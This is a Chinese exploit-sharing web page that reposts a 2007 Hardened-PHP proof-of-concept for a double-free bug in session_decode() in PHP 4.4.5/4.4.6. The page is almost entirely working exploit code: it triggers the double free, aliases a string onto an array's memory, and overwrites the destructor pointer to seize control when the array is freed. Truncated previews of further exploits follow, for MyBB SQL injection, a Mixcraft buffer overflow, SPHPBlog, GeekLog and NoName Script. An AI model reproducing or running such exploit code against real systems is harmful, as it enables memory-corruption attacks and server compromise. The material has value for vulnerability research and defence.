建站极客
网络安全 Exploit 正文
PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
所属分类:
网络安全 / Exploit
阅读数:
119
收藏 0
赞 0
分享
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
ini_set("session.serialize_handler", "php");
session_start();
$varname = str_repeat("D", 39);
$$varname = &$_SESSION;
// Trigger the double free
session_decode($varname.'|i:0;');
$_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
$_________________a = array("OneElement");
// Now x and a point to the same memory. Therefore x can be used to modify a
// Overwrite pointer to the destructor
$_________________x[8*4 0] = chr(0x55);
$_________________x[8*4 1] = chr(0x66);
$_________________x[8*4 2] = chr(0x77);
$_________________x[8*4 3] = chr(0x88);
// Trigger the destruction
unset($_________________a);
?>
MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
评论 0
收藏 0
赞 0
分享
Acoustica Mixcraft #!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
评论 0
收藏 0
赞 0
分享
Simple PHP Blog (SPHPBlog) <?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
评论 0
收藏 0
赞 0
分享
GeekLog #!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
评论 0
收藏 0
赞 0
分享
NoName Script ################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
评论 0
收藏 0
赞 0
分享
查看更多